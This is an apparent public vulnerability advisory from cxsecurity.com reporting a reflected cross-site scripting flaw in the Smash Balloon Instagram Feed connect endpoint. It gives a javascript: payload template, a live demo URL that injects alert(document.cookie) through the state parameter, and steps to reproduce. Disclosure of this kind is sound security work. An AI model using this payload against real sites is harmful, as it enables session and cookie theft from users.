Smash Balloon Instagram Feed - Cross-Site Scripting Vulnerabilities

2021.11.10
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

############################################################# # Title: Smash Balloon Instagram Feed - Cross-Site Scripting Vulnerabilities # Inventor: Gh05t666nero (IndoGhostSec) # Vendor: Smash Balloon Team # Version: 2.9.5 # Product: https://smashballoon.com/instagram-feed/ # Machine: Linux gh05t666nero 5.10.0-kali9-686-pae #1 SMP Debian 5.10.46-4kali1 (2021-08-09) i686 GNU/Linux # Date: 2021-04-09 ############################################################# [*] About: ════════ One of their social media interface APIs to be precise (connect.smashballoon.com) suffers from a Reflected XSS vulnerability, allowing attackers to steal victim sessions. ############################################################# [*] Exploit: ═════════ javascript:[Malicious-JS] ############################################################# [*] Demo: ════════ https://connect.smashballoon.com/auth/ig/instagram-basic-display-redirect.php?state=javascript:alert(document.cookie); ############################################################# [*] Reproduce: ════════════ 1. Visit the link above. 2. Click the href button that says "click here". 3. Javascript code will be triggered so that XSS occurs. ############################################################# [*] Contact: ══════════ # Instagram: @ojansec # E-mail: admin@deepweb.id


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top